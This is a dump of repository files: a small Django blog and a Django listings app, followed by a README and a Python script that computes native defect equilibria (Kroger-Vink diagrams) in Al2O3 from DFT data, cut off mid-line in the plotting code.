"alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 39.11111068725586, "blob_id": "fe122dc407822f88f776bb046bfda858e303f9a9", "content_id": "d9810a94fd35fa44e8f42ed111cf01b59f9bdabe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 361, "license_type": "no_license", "max_line_length": 67, "num_lines": 9, "path": "/myblog/urls.py", "repo_name": "cuongtranba/django-python-blog", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom . import views\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^login/$',views.UserLogin,name='UserLogin'),\n url(r'^userlogout/$',views.UserLogout,name='UserLogout'),\n url(r'^userregister/$',views.UserRegister,name='UserRegister'),\n url(r'^createpost/$',views.CreatePost,name='CreatePost'),\n]\n" }, { "alpha_fraction": 0.4927752912044525, "alphanum_fraction": 0.5057299733161926, "avg_line_length": 30.85714340209961, "blob_id": "a082414361e9c4fb95be45420029a23296aa9864", "content_id": "9194f5bfa76db3ceb5026171169ce26797d4cc40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2007, "license_type": "no_license", "max_line_length": 99, "num_lines": 63, "path": "/myblog/migrations/0001_initial.py", "repo_name": "cuongtranba/django-python-blog", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.7 on 2016-10-16 14:18\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Post',\n fields=[\n ('is_deleted', models.BooleanField(default=False)),\n ('id', models.AutoField(primary_key=True, serialize=False)),\n ('title', models.CharField(max_length=200)),\n ('content', models.TextField()),\n ('pub_date', models.DateTimeField()),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='Tag',\n fields=[\n ('is_deleted', models.BooleanField(default=False)),\n ('id', models.AutoField(primary_key=True, serialize=False)),\n ('tag_name', models.CharField(max_length=20)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('is_deleted', models.BooleanField(default=False)),\n ('id', models.AutoField(primary_key=True, serialize=False)),\n ('name', models.CharField(max_length=20)),\n ('picture_url', models.CharField(max_length=200)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.AddField(\n model_name='post',\n name='tag',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='myblog.Tag'),\n ),\n migrations.AddField(\n model_name='post',\n name='user',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='myblog.User'),\n ),\n ]\n" } ]
6
cmr5289/ibnlist
https://github.com/cmr5289/ibnlist
93a94ab247454a3a87ebbb888bf00327fbc7f6fa
a7a3a7f5ea36323960673f4553d03a714317fbb1
cc5449d6558371802aaedddbaf5a50d256ce48f7
refs/heads/dev
2018-10-13T04:35:40.184394
2018-07-11T17:18:23
2018-07-11T17:18:23
127,462,065
0
0
null
2018-03-30T18:48:43
2018-03-30T19:07:05
2018-03-30T19:07:35
CSS
[ { "alpha_fraction": 0.7274401187896729, "alphanum_fraction": 0.7292817831039429, "avg_line_length": 19.11111068725586, "blob_id": "b8cca4bfa8c670177c1c356bd360392b4f702e4f", "content_id": "b159692835a35c01ec1ab23f4da49306ce5c7875", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 543, "license_type": "no_license", "max_line_length": 56, "num_lines": 27, "path": "/ibnList/admin.py", "repo_name": "cmr5289/ibnlist", "src_encoding": "UTF-8", "text": "\"\"\"\nAdmin panel configuration\n\"\"\"\nfrom django.contrib import admin\n\n# from bucksac.core.main.admin import GroupAdmin\n\nfrom ibnList import models\n\n\nclass CommentInLine(admin.TabularInline):\n model = models.Comments\n extra = 0\n\n\nclass ListingAdmin(admin.ModelAdmin):\n search_fields = ('listing_name',)\n list_filter = ('active',)\n inlines = [\n CommentInLine,\n ]\n\n\nadmin.site.register(models.ListingEntry, ListingAdmin)\n\n# admin.site.register(models.DirectoryGroup, GroupAdmin)\n# admin.site.register(models.DirectoryRole)\n" }, { "alpha_fraction": 0.566293478012085, "alphanum_fraction": 0.5869181156158447, "avg_line_length": 38.46511459350586, "blob_id": "e736ca340533b6adeccfcbc66d7d3e72832175e5", "content_id": "ee947ec0b43866df31668f46f1654cbb4693277e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1697, "license_type": "no_license", "max_line_length": 145, "num_lines": 43, "path": "/ibnList/migrations/0001_initial.py", "repo_name": "cmr5289/ibnlist", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.2 on 2018-05-01 18:41\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comments',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('comment', models.CharField(blank=True, max_length=500, null=True, verbose_name=b'Comment')),\n ],\n ),\n migrations.CreateModel(\n name='ListingEntry',\n fields=[\n ('listing_id', models.AutoField(primary_key=True, serialize=False)),\n ('listing_name', models.CharField(max_length=500, verbose_name=b'Listing Name')),\n ('listing_description', models.TextField(blank=True, null=True)),\n ('listing_email', models.CharField(max_length=255)),\n ('listing_location_street_address', models.CharField(max_length=100)),\n ('listing_location_city', models.CharField(max_length=30)),\n ('listing_location_state', models.CharField(max_length=20)),\n ('listing_location_zip', models.CharField(max_length=12)),\n ('active', models.BooleanField()),\n ],\n ),\n migrations.AddField(\n model_name='comments',\n name='person',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='comments', to='ibnList.ListingEntry'),\n ),\n ]\n" }, { "alpha_fraction": 0.5534206628799438, "alphanum_fraction": 0.5619875192642212, "avg_line_length": 25.022293090820312, "blob_id": "e46b89f9af42c4e0bf5e7b2b907befe36f60dd02", "content_id": "73b194969227e89fee866a000b8c44deb0831379", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8171, "license_type": "no_license", "max_line_length": 66, "num_lines": 314, "path": "/ibnList/models.py", "repo_name": "cmr5289/ibnlist", "src_encoding": "UTF-8", "text": "\"\"\"\nData models for ibnlist\n\"\"\"\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\n# from bucksac.core.main.models import Group, Role\n# from bucksac.back_office.world.models import Building, Room\n\n\n# class DirectoryRole(Role):\n# \"\"\"\n# A group role\n# \"\"\"\n# pass\n\n\n# class DirectoryGroup(Group):\n# \"\"\"\n# Group model\n# \"\"\"\n# pass\n\n# Listing Types\nListing_types = (\n ('status_code', 'display_name'),\n)\n\n\n# Listing Entries\nclass ListingEntry(models.Model):\n # Primary Key\n listing_id = models.AutoField(\n primary_key=True)\n # Listing Name\n listing_name = models.CharField(\n max_length=500,\n blank=False,\n verbose_name='Listing Name',\n null=False)\n # Listing Description\n listing_description = models.TextField(\n blank=True,\n null=True)\n # Listing Details not sure what to do for this yet\n # Listing Contact Info\n listing_email = models.CharField(\n max_length=255,\n blank=False,\n null=False)\n # Listing Location\n # Listing Location Address\n listing_location_street_address = models.CharField(\n max_length=100,\n blank=False,\n null=False)\n # Listing Location City\n listing_location_city = models.CharField(\n max_length=30,\n blank=False,\n null=False)\n # Listing Location State\n listing_location_state = models.CharField(\n max_length=20,\n blank=False,\n null=False)\n # Listing Location Zip\n listing_location_zip = models.CharField(\n max_length=12,\n blank=False,\n null=False)\n # Is Active\n active = models.BooleanField()\n\n\nclass Comments(models.Model):\n # Comment\n comment = models.CharField(\n max_length=500,\n verbose_name=\"Comment\",\n blank=True,\n null=True)\n # Many Comments to One Listing\n person = models.ForeignKey(\n ListingEntry,\n related_name='comments',\n null=True,\n on_delete=models.SET_NULL)\n\n def __str__(self):\n return \"%s\" % (self.pk)\n\n def __unicode__(self):\n return \"%s\" % (self.pk)\n\n\n\n# # New Directory Models\n# class BuildingEntry(models.Model):\n# # Building ID, Primary Key\n# building_id = models.AutoField(\n# primary_key=True)\n# # Building Name\n# building_name = models.CharField(\n# max_length=255,\n# blank=False,\n# verbose_name=\"Building Name\",\n# null=False)\n# # Campus location\n# campus = models.CharField(\n# max_length=255,\n# blank=False,\n# null=False)\n# # Is Active\n# active = models.BooleanField()\n\n# def __str__(self):\n# return \"%s\" % (self.building_name)\n\n# def __unicode__(self):\n# return \"%s\" % (self.building_name)\n\n# class Meta:\n# ordering = ['building_name']\n\n\n# class DepartmentEntry(models.Model):\n# # Department ID, Primary Key\n# department_id = models.AutoField(\n# primary_key=True)\n# # Department Name\n# department_name = models.CharField(\n# max_length=255,\n# verbose_name=\"Department Name\",\n# blank=False,\n# null=False)\n# # Is Active\n# active = models.BooleanField()\n\n# def __str__(self):\n# return \"%s\" % (self.department_name)\n\n# def __unicode__(self):\n# return \"%s\" % (self.department_name)\n\n# class Meta:\n# ordering = ['department_name']\n\n\n# class PersonEntry(models.Model):\n# # Name\n# name = models.CharField(\n# max_length=255,\n# blank=False,\n# null=False)\n# # Title Ex: Dr.\n# title = models.CharField(\n# max_length=255,\n# blank=True,\n# null=True,\n# help_text=\"Title should be \\\"Dr.\\\" or left blank\")\n# # Suffix Ex: MFA, MBA, PHD\n# suffix = models.CharField(\n# max_length=255,\n# blank=True,\n# null=True)\n# # Office Room Number\n# room_number = models.CharField(\n# max_length=50,\n# verbose_name=\"Room Number\",\n# blank=True,\n# null=True)\n# # Email\n# email = models.CharField(\n# max_length=255,\n# blank=False,\n# null=False)\n# # Uname, used to associate user for editing own profile\n# uname = models.CharField(\n# max_length=255,\n# blank=False,\n# null=False)\n# # Person's Position\n# position = models.CharField(\n# max_length=255,\n# blank=False,\n# null=False)\n# # Person's Degrees\n# degree = models.CharField(\n# max_length=255,\n# blank=True,\n# null=True)\n# # Bio\n# bio = models.TextField(\n# blank=True,\n# null=True)\n# # Person Status Code Ex: AA or PRES\n# status_code = models.CharField(\n# max_length=100,\n# verbose_name=\"Status Code\",\n# choices=PERSON_STATUS_CHOICES,\n# default=\"Default\",\n# null=True,\n# blank=True)\n# # Building Foreign Key\n# building = models.ForeignKey(\n# BuildingEntry,\n# null=True,\n# on_delete=models.SET_NULL,\n# limit_choices_to={'active': True})\n# # Department Foreign Key\n# department = models.ManyToManyField(\n# DepartmentEntry,\n# limit_choices_to={'active': True},\n# help_text=\"To select multiple Departments use ctrl + \" +\n# \"click (cmd + click on mac)\")\n# # Is Active\n# active = models.BooleanField()\n\n# def get_first_name(self):\n# return self.name.split(\" \")[0]\n\n# def get_last_name(self):\n# temp = self.name.split(\" \")\n# return temp[len(temp) - 1]\n\n\n# class OfficeEntry(models.Model):\n# # Office ID, Primary Key\n# office_id = models.AutoField(\n# primary_key=True)\n# # Office name\n# office_name = models.CharField(\n# max_length=255,\n# verbose_name=\"Office Name\",\n# blank=False,\n# null=False)\n# # Room Number for the Office\n# office_room_number = models.CharField(\n# max_length=10,\n# verbose_name=\"Office Room Number\",\n# blank=False,\n# null=False)\n# # Office Email\n# office_email = models.CharField(\n# max_length=255,\n# verbose_name=\"Office Email\",\n# blank=True,\n# null=True)\n# # Office Status Code Ex: FAX or LAB\n# status_code = models.CharField(\n# max_length=100,\n# verbose_name=\"Office Status Code\",\n# choices=OFFICE_STATUS_CHOICES,\n# default=\"Default\",\n# null=True,\n# blank=True)\n# # Building Foreign Key\n# building = models.ForeignKey(\n# BuildingEntry,\n# null=True,\n# on_delete=models.SET_NULL,\n# limit_choices_to={'active': True})\n# # Department Foreign Key\n# department = models.ManyToManyField(\n# DepartmentEntry,\n# limit_choices_to={'active': True})\n# # Is part of the Frequent Contacted list\n# frequent = models.BooleanField(\n# verbose_name=\"Frequently Contacted Office\")\n# # Is Active\n# active = models.BooleanField()\n\n\n# class PhoneNumber(models.Model):\n# # Phone Number\n# phone_number = models.CharField(\n# max_length=50,\n# verbose_name=\"Phone Number\",\n# blank=True,\n# null=True)\n# # Many Phones to One Person\n# person = models.ForeignKey(\n# PersonEntry,\n# related_name='phone_numbers',\n# null=True,\n# on_delete=models.SET_NULL)\n\n# def __str__(self):\n# return \"%s\" % (self.pk)\n\n# def __unicode__(self):\n# return \"%s\" % (self.pk)\n\n\n# class OfficePhoneNumber(models.Model):\n# # Phone Number\n# phone_number = models.CharField(\n# max_length=50,\n# verbose_name=\"Phone Number\",\n# blank=True,\n# null=True)\n# # Many Phones to One Office\n# office = models.ForeignKey(\n# OfficeEntry,\n# related_name='office_phone_numbers',\n# null=True,\n# on_delete=models.SET_NULL)\n\n# def __str__(self):\n# return \"%s\" % (self.pk)\n\n# def __unicode__(self):\n# return \"%s\" % (self.pk)\n" }, { "alpha_fraction": 0.4399999976158142, "alphanum_fraction": 0.6933333277702332, "avg_line_length": 14, "blob_id": "1be2d83c8b2308a3d5080d7e5da676ea60ac2d65", "content_id": "15a84334e3c1f9d68d4e31bafe0d4fb8f04b77c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 75, "license_type": "no_license", "max_line_length": 18, "num_lines": 5, "path": "/requirements.txt", "repo_name": "cmr5289/ibnlist", "src_encoding": "UTF-8", "text": "Django==1.11.2\nolefile==0.44\nPillow==4.1.1\npytz==2017.2\nvirtualenv==15.1.0\n" } ]
4
vrindaasomjit/Defect-equilibria
https://github.com/vrindaasomjit/Defect-equilibria
b60e800045a21ad73954536649cab4b80b554c1a
628bb6f493c6dbd0b4f95ecf104b769cc3ed2ca2
163da9e5c929906473346b0657fc6921692070ef
refs/heads/main
2023-08-15T00:38:02.381583
2021-10-10T03:42:01
2021-10-10T03:42:01
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7780082821846008, "alphanum_fraction": 0.8008298873901367, "avg_line_length": 191.8000030517578, "blob_id": "01462bc2014abc17f9851d35819efdd33158f9b0", "content_id": "e8baa8663c11febb34d1ba1fe8efdcd0fd8bb367", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1929, "license_type": "no_license", "max_line_length": 763, "num_lines": 10, "path": "/README.md", "repo_name": "vrindaasomjit/Defect-equilibria", "src_encoding": "UTF-8", "text": "# Defect-equilibria\nThis repository contains the Python code and example input files to calculate defect equilibria in ionic crystals (also known as Kroger-Vink or Brouwer diagrams). <br/>\n<br/>\nThis code was used to calculate the defect equilibria in undoped Al2O3 across a range of oxygen gas partial pressures at 1100 K and in undoped Al2O3 across a range of hydrogen gas partial pressures at 300 K. For the latter case, the concentrations of native defects in Al2O3 are kept fixed at the values obtained at 1100 K, high pO2 conditions. This is to reflect 'frozen in' defects from Al2O3 growth and subsequent hydrogen complex formation during cooldown. The low temperature (300 K) and high migration barriers for native defects in Al2O3 prevents them from re-equilibrating with the environment, causing them to be kinetically trapped. However, hydrogen is mobile enough to equilibrate with the environment and form complexes with the native defects. <br/>\n<br/>\nOur paper (Somjit, Vrindaa, and Bilge Yildiz. \"Doping α-Al2O3 to reduce its hydrogen permeability: Thermodynamic assessment of hydrogen defects and solubility from first principles.\" Acta Materialia 169 (2019): 172-183) and its supplementary information has details on the method, derivation of the different concentration terms, and interpretation of the results, etc.<br/>\n<br/>\nI wrote this code early on during my PhD when I was still learning the ropes, so it is not the most modularized. I hope to clean it up sometime, however, it is still easy to understand and use, and can be extended to other materials and other cases as well (such as doped systems).<br/>\n<br/>\nThis code self-consistently calculates the Fermi level at a given pO2 or pH2 at which charge neutrality is obtained. The electronic and ionic defect concentrations are calculated using this equilibrium Fermi level at a given pO2. Doing this over a range of pO2 gives us the Kroger-Vink diagram.\n" }, { "alpha_fraction": 0.5629838705062866, "alphanum_fraction": 0.6112903356552124, "avg_line_length": 43.28571319580078, "blob_id": "7859b194e092d8fdc2487d916668488c828b68f9", "content_id": "29455a95bdfcc5fa789e185c46e77f4aa1374d4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12400, "license_type": "no_license", "max_line_length": 129, "num_lines": 280, "path": "/native defect equilibria/KVD_native_defect_equilibria.py", "repo_name": "vrindaasomjit/Defect-equilibria", "src_encoding": "UTF-8", "text": "\"\"\"\nThis program constructs the Kroger-Vink plot for Al2O3 at a given temperature.\n\nThe charge neutrality equation has the following terms: sum of (charge of defect*concentration of defect),\nconcentration of valence band holes and concentration of conduction band electrons.\n\nEach term is a non-linear function of the Fermi level Ef, which ranges from 0 to Eg (bandgap).\nThe electronic defect concentrations are calculated using the Fermi-Dirac distribution and \nintegrating over the density of states suing the trapezoidal method.\n\nThus, the bisection method is used to solve for Ef that achieves charge neutrality at each pO2. \n\nFrom Ef, we can calculate the equilibrium defect concentration at a given pO2.\nPerforming this over a range of pO2 gives us the Kroger-Vink diagram.\n\"\"\"\nimport numpy as np\nimport math as m\nimport matplotlib.pyplot as plt\nimport pylab\n\"\"\"\n*****************TO FIND CONCENTRATION OF ELECTRONIC DEFECTS*******************\n\"\"\"\n\"\"\"\nTo find VBM and CBM row numbers\n\"\"\"\n# finds the VBM and returns its row number\ndef find_VBM(rows_DOS, E_VBM): \n for i in range(0, rows_DOS): \n if DOS[i,0] == E_VBM: #first column of DOS has the energy\n VBM_line = i\n return VBM_line\n# finds the CBM and returns its row number\ndef find_CBM(rows_DOS, E_CBM): \n for i in range(0, rows_DOS): \n if DOS[i,0] == E_CBM: #first column of DOS has the energy\n CBM_line = i\n return CBM_line\n\n\"\"\"\nTrapezoidal method to find concentration of electronic defects by using the Fermi-Dirac distribution\nand integrating over density of states\nEf is calculated assuming E_VBM is the reference level, therefore E_VBM term included in the F-D distribution\n\"\"\"\n# returns the concentration of valence band holes when Fermi level=Ef\ndef trapz_holes(VBM_line, DOS, Ef, E_VBM): \n conc_holes = 0\n func = np.empty((VBM_line+1, 1), dtype=float) \n for i in range(0, VBM_line+1): \n func[i] = ((DOS[i,1] + DOS[i,2]) * m.exp(-(Ef + E_VBM - DOS[i,0])/(k * T)))/(1 + m.exp(-(Ef + E_VBM - DOS[i,0])/(k * T)))\n for i in range(0, VBM_line): \n conc_holes = conc_holes + ((DOS[i+1,0] - DOS[i,0]) * (func[i+1] + func[i])) #trapezoidal method\n conc_holes = conc_holes/2\n return conc_holes\n# returns the concentration of conduction band electrons when Fermi level=Ef\ndef trapz_electrons(rows_DOS, CBM_line, DOS, Ef, E_VBM): \n CB = np.empty((rows_DOS - CBM_line, 5),dtype=float)\n conc_electrons = 0\n CB = DOS[CBM_line:(rows_DOS), 0:6]\n func = np.empty((CB[:,0].size, 1), dtype=float)\n for i in range(0, CB[:,0].size): \n func[i] = (CB[i,1] + CB[i,2])/(1 + m.exp((CB[i,0] - Ef - E_VBM)/(k * T)))\n for i in range(0, CB[:,0].size-1): \n conc_electrons = conc_electrons + ((CB[i+1,0] - CB[i,0]) * (func[i+1] + func[i])) #trapezoidal method\n conc_electrons = conc_electrons/2\n return conc_electrons\n\"\"\"\n****************TO FIND DEFECT CONCENTRATIONS AT A GIVEN pO2*******************\n\"\"\"\n\"\"\"\nTo find chemical potentials\n\"\"\"\n# returning chemical potentials of O and Al over pO2 range: 1e-45 atm to 1 atm\n# uAl=EDFT_Al @ pO2=6.5e-42 atm, hence this limit\ndef O_chempot(DFTE_O2, E_over, u0_O2, k, T, p0):\n p = np.empty((46,1), dtype=float)\n u_O = np.empty((46,1), dtype=float) \n for i in range(0,46): \n p[i] = m.pow(10,-(45-i))\n u_O[i] = (1/2) * (DFTE_O2 + E_over + u0_O2 + (k * T * m.log(p[i]/p0)))\n return u_O\ndef Al_chempot(DFTE_Al2O3, u_O):\n u_Al = np.empty((46,1),dtype=float) \n for i in range(0,46): \n u_Al[i] = (DFTE_Al2O3 - (3 * u_O[i]))/2\n return u_Al \n\"\"\"\nTo find defect formation energies at a given pO2\n\"\"\"\n# returns vector of formation energies of various defects at a given pO2, Fermi level Ef\ndef formn_E(KV, E_perf, u_O, u_Al, E_VBM, Ef):\n delE = np.empty((14,1),dtype=float)\n for i in range(0,14): #change!\n delE[i] = KV[i,4] - E_perf - (KV[i,2] * u_O) - (KV[i,3] * u_Al) + (KV[i,1] * (E_VBM + Ef)) + KV[i,6] \n return delE\n\"\"\"\nTo find defect concentrations at a given pO2 using Boltzmann approx\n\"\"\"\n# returns concentration of oxygen vacancies (all charge states)\ndef conc_VO(KV, delE, k, T):\n nD = KV[0:3,[5]] #N_site*N_config\n delEVO = delE[0:3] #copying formnE of VO from delE\n VO = np.empty((3,1),dtype=float)\n for i in range (0,3): \n VO[i] = nD[i] * np.exp(-delEVO[i]/(k * T))\n return VO \n# returns concentration of aluminum vacancies (all charge states)\ndef conc_VAl(KV, delE, k, T):\n nD = KV[3:7,[5]] #N_site*N_config\n delEVAl = delE[3:7] #copying formnE of VAl from delE\n VAl = np.empty((4,1),dtype=float)\n for i in range (0,4): \n VAl[i] = nD[i] * np.exp(-delEVAl[i]/(k * T))\n return VAl\n# returns concentration of oxygen interstitials (all charge states)\ndef conc_IO(KV, delE, k, T):\n nD = KV[7:10,[5]] #N_site*N_config\n delEIO = delE[7:10] #copying formnE of IO from delE\n IO = np.empty((3,1),dtype=float)\n for i in range (0,3): \n IO[i] = nD[i] * np.exp(-delEIO[i]/(k * T))\n return IO \n# returns concentration of aluminum interstitials (all charge states)\ndef conc_IAl(KV, delE, k, T):\n nD = KV[10:14,[5]] #N_site*N_config\n delEIAl = delE[10:14] #copying formnE of IAl from delE\n IAl = np.empty((4,1),dtype=float)\n for i in range (0,4): \n IAl[i] = nD[i] * np.exp(-delEIAl[i]/(k * T))\n return IAl\n\"\"\"\n**************************BISECTION METHOD*************************************\n\"\"\"\ndef samesign(fa, fb):\n return fa*fb>0\n# calculates the value of the charge-neutrality function at given pO2 by \n# calculating the electronic and ionic defect concentrations at Ef \ndef neut_fn(VBM_line, DOS, Ef, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O, u_Al, k, T):\n conc_holes = trapz_holes(VBM_line, DOS, Ef, E_VBM) \n conc_electrons = trapz_electrons(rows_DOS, CBM_line, DOS, Ef, E_VBM) \n delE = formn_E(KV, E_perf, u_O, u_Al, E_VBM, Ef) \n VO = conc_VO(KV, delE, k, T) \n VAl = conc_VAl(KV, delE, k, T) \n IO = conc_IO(KV, delE, k, T) \n IAl = conc_IAl(KV, delE, k, T) \n q_VO = KV[0:3,[1]] \n q_VAl = KV[3:7,[1]] \n q_IO = KV[7:10,[1]] \n q_IAl = KV[10:14,[1]] \n qVO = np.empty((3,1),dtype=float) \n qVAl = np.empty((4,1),dtype=float) \n qIO = np.empty((3,1),dtype=float) \n qIAl = np.empty((4,1),dtype=float) \n for i in range(0,3):\n qVO[i] = q_VO[i] * VO[i]\n for i in range(0,4):\n qVAl[i] = q_VAl[i] * VAl[i]\n for i in range(0,3):\n qIO[i] = q_IO[i] * IO[i]\n for i in range(0,4):\n qIAl[i] = q_IAl[i] * IAl[i] \n sum_qD = sum(qVO) + sum(qVAl) + sum(qIO) + sum(qIAl)\n f = sum_qD + conc_holes - conc_electrons\n return f\n# this function calculates the Ef that solves the neutrality equation at a given pO2 \ndef bisection(VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O, u_Al, k, T):\n fa = neut_fn(VBM_line, DOS, Efa, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O, u_Al, k, T)\n fb = neut_fn(VBM_line, DOS, Efb, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O, u_Al, k, T)\n assert not samesign(fa,fb)\n while Efb - Efa > 1e-10:\n Efc = (Efa + Efb)/2\n fc = neut_fn(VBM_line, DOS, Efc, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O, u_Al, k, T)\n if samesign(fa,fc):\n Efa = Efc\n elif samesign(fb,fc):\n Efb = Efc\n return Efc \n\"\"\"\n************************FINAL Ef AND DEFECT CONCENTRATIONS*********************\n\"\"\"\n# this function uses bisection method to calculate f,Ef and [D] at various pO2 \ndef final_f_Ef_conc(VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O, u_Al, k, T):\n f = np.empty((46,1),dtype=float) # to check value of neutrality equation using final Ef\n Ef = np.empty((46,1),dtype=float)\n delE = np.empty((14,46),dtype=float)\n final_h = np.empty((46,1),dtype=float)\n final_e = np.empty((46,1),dtype=float)\n final_VO = np.empty((3,46),dtype=float)\n final_VAl = np.empty((4,46),dtype=float)\n final_IO = np.empty((3,46),dtype=float)\n final_IAl = np.empty((4,46),dtype=float)\n for i in range(0,46):\n Ef[i] = bisection(VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O[i], u_Al[i], k, T)\n f[i] = neut_fn(VBM_line, DOS, Ef[i], E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O[i], u_Al[i], k, T)\n delE[:,[i]] = formn_E(KV, E_perf, u_O[i], u_Al[i], E_VBM, Ef[i])\n final_h[i] = trapz_holes(VBM_line, DOS, Ef[i], E_VBM)\n final_e[i] = trapz_electrons(rows_DOS, CBM_line, DOS, Ef[i], E_VBM)\n final_VO[:,[i]] = conc_VO(KV, delE[:,[i]], k, T)\n final_VAl[:,[i]] = conc_VAl(KV, delE[:,[i]], k, T)\n final_IO[:,[i]] = conc_IO(KV, delE[:,[i]], k, T)\n final_IAl[:,[i]] = conc_IAl(KV, delE[:,[i]], k, T)\n return (final_VO,final_VAl,final_IO,final_IAl,final_h,final_e,f,Ef,delE)\n \n\"\"\"\n****************************MAIN BODY******************************************\n\"\"\"\nDOS = np.loadtxt(\"dosperfect.txt\") # DOS from VASP\nDOS[:,1] = DOS[:,1]/24 # spin-up DOS per formula unit of Al2O3\nDOS[:,2] = DOS[:,2]/24 # spin-down DOS per formula unit of Al2O3\nKV = np.loadtxt(\"native_data.txt\",skiprows=1) # array of the defect supercell data\n# defining constants\nk = 8.6173303e-05 # Boltzmann constant in eV\nE_VBM = 5.795 # Valence band maximum in eV from VASP DOS\nE_CBM = 11.638 # Conduction band minimum in eV from VASP DOS\nrows_DOS = len(DOS) # number of rows in the array DOS\n# Ef ranges from 0 to Eg in eV\nEfa = 0\nEfb = 5.84\nVBM_line = find_VBM(rows_DOS, E_VBM)\nCBM_line = find_CBM(rows_DOS, E_CBM)\n# defining constants to calculate chemical potentials \nDFTE_Al2O3 = -37.4057 # DFT energy of Al2O3(s) per f.u. in eV\nDFTE_O2 = -9.8591 # DFT energy of O2(g) in eV\nE_perf = -897.74454 # DFT energy in eV of perfect supercell of Al2O3\nE_over = 1.36 # O2 GGA overbinding correction\nu0_O2 = -2.4534 # at 1100 K (Temperature correction to u_O)\np0 = 1 # standard pressure in atm\nT = 1100 # temperature at which KV diagram plotted in K\n# calculating chemical potentials\nu_O = O_chempot(DFTE_O2, E_over, u0_O2, p0)\nu_Al = Al_chempot(DFTE_Al2O3, u_O)\n# calculating all final defect concentrations at all pO2 by using bisection method to solve\n# charge-neutrality equation \nfunc = final_f_Ef_conc(VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O, u_Al, k, T)\nfinalVO = func[0]\nfinalVAl = func[1]\nfinalIO = func[2]\nfinalIAl = func[3]\nfinalh = func[4]\nfinale = func[5]\nf = func[6]\nEf = func[7]\ndelE = func[8]\np = np.array([[1e-45,1e-44,1e-43,1e-42,1e-41,1e-40,1e-39,\n 1e-38,1e-37,1e-36,1e-35,1e-34,1e-33,1e-32,1e-31,1e-30,1e-29,1e-28,\n 1e-27,1e-26,1e-25,1e-24,1e-23,1e-22,1e-21,1e-20,1e-19,1e-18,1e-17,\n 1e-16,1e-15,1e-14,1e-13,1e-12,1e-11,1e-10,1e-09,1e-08,1e-07,1e-06,\n 1e-05,1e-04,1e-03,1e-02,1e-01,1]])\nlogp = np.log10(p)\nlogVO = np.log10(finalVO)\nlogVAl = np.log10(finalVAl)\nlogIO = np.log10(finalIO)\nlogIAl = np.log10(finalIAl)\nlogh = np.log10(finalh)\nloge = np.log10(finale)\n#plt.figure(figsize=(8,6))\n#plt.figure(figsize=(3.84,2.95))\naxes = plt.gca()\naxes.set_xlim([-45,0])\naxes.set_ylim([-16,-4]) \nfont = {'fontname':'Times New Roman','fontsize':7}\nplt.xlabel('logpO2 (atm)',**font)\nplt.ylabel('log[D] per f.u. Al2O3',**font)\nplt.plot(logp[0,:],logVO[0,:],color='#1b9e77',marker='.',label='VOx')\nplt.plot(logp[0,:],logVO[1,:],color='#1b9e77',marker='*',label='VO+1')\nplt.plot(logp[0,:],logVO[2,:],color='#1b9e77',marker='p',label='VO+2')\nplt.plot(logp[0,:],logVAl[0,:],color='#d95f02',marker='P',label='VAlx')\nplt.plot(logp[0,:],logVAl[1,:],color='#d95f02',marker='+',label='VAl-1')\nplt.plot(logp[0,:],logVAl[2,:],color='#d95f02',marker='x',label='VAl-2')\nplt.plot(logp[0,:],logVAl[3,:],color='#d95f02',marker='o',label='VAl-3')\nplt.plot(logp[0,:],logIO[0,:],color='#7570b3',marker='X',label='IOx')\nplt.plot(logp[0,:],logIO[1,:],color='#7570b3',marker='h',label='IO-1')\nplt.plot(logp[0,:],logIO[2,:],color='#7570b3',marker='H',label='IO-2')\nplt.plot(logp[0,:],logIAl[0,:],color='#e7298a',marker='d',label='IAlx')\nplt.plot(logp[0,:],logIAl[1,:],color='#e7298a',marker='D',label='IAl+1')\nplt.plot(logp[0,:],logIAl[2,:],color='#e7298a',marker='s',label='IAl+2')\nplt.plot(logp[0,:],logIAl[3,:],color='#e7298a',marker='^',label='IAl+3')\nplt.plot(